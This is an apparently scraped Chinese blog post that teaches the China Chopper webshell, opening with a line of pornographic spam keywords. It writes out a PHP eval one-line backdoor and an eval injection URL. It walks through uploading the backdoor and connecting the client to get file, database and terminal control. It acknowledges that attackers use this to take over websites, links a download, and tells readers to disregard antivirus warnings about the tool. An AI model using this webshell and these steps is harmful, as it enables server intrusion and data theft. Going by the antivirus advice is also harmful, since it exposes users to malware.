欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

中國菜刀的功能介紹和使用方法(黑站利器與后門利用測試工具)

代瀟瑞博客   發(fā)布時間:2014-05-09 14:49:07   作者:佚名   我要評論
中國菜刀,一個非常好用而又強大的webshell,它可不是用來切菜的做飯的道具哦,是一款專業(yè)的網(wǎng)站管理軟件,大小只有300多KB,真是小巧實用啊

中國菜刀,一個非常好用而又強大的webshell,它可不是用來切菜的做飯的道具哦,是一款專業(yè)的網(wǎng)站管理軟件,大小只有300多KB,真是小巧實用??!不過被不法分子利用到,就是一個黑站的利器了。我記得以前接觸的時候摸索了好久才會用,哈哈。。后來領悟之后才發(fā)現(xiàn)并不難操作,同時功能也比我想象的要強大。

注:單獨的菜刀沒有效果,需要服務器端有一句話后門,或漏洞,例如這樣的

http://127.0.0.1:89/mingfang/index.php?q=${${@eval%28$_POST[cmd]%29}}

配置圖:

1.中國菜刀支持的服務端腳本:PHP、ASP、asp.net;

2.主要功能有:文件管理(有足夠的權限時候可以管理整個磁盤/文件系統(tǒng)),數(shù)據(jù)庫管理,虛擬終端。

3.菜刀的工作原理是:利用上傳到服務器的一句話腳本再通過一些添加配置就可以工作了。

今天我只介紹PHP的方法(其他的大同小異)。

首先:我們首先要新建一個php文件,文件名隨意取,然后寫入一句代碼:

<?php eval($_POST['ee']); ?>

 ;eval()這個函數(shù)大家并不陌生吧,就是把里面的字符串作為PHP代碼執(zhí)行。最后把這個文件保存,上傳到你站點里面,可以是根目錄,也可以是其他,都行的。如下圖:

第二步:打開菜刀這個軟件,進入如下界面,右鍵點擊“添加”;如下圖:

第三步:此時會彈出一個添加shell的對話框,由圖一看出我的 “dxr.php”上傳在站點根目錄,所以這里的地址填為:http://localhost/dxr.php 。地址后面的小框框里面的“ee”就是你的“口令”,也就是

<?php eval($_POST['ee']); ?>

這里的“ee”。下面配置項如果你知道用戶名密碼就填,不知道,不填,也不會影響文件管理和虛擬終端這兩個功能,只是不能查看數(shù)據(jù)庫了。

最后:點擊“添加”按鈕,成功后就會產(chǎn)生一條新的記錄,鼠標右鍵點擊就可以進行操作了,如下圖,可以進行文件管理,數(shù)據(jù)庫管理,虛擬終端。哈哈...大功告成!!

   

所以很多黑站者利用一些網(wǎng)站漏洞,上傳一句話木馬后,就基本上可以黑下你的站了。中國菜刀,就是這么強大??!

操作效果截圖一:

 

操作效果截圖二:

 

操作效果截圖三:


菜刀下載:http://www.dbjr.com.cn/softs/163997.html

終于寫完了,喜歡的話就支持一下哦,代瀟瑞博客,專注于PHP學習??!

最后說明一下:此軟件打開時殺毒軟件可能會報毒的,我已經(jīng)用了很多遍,反正都沒事。如果你不相信的話,也就不用下載了,呵呵。

原文參考:http://www.daixiaorui.com/read/17.html

相關文章

最新評論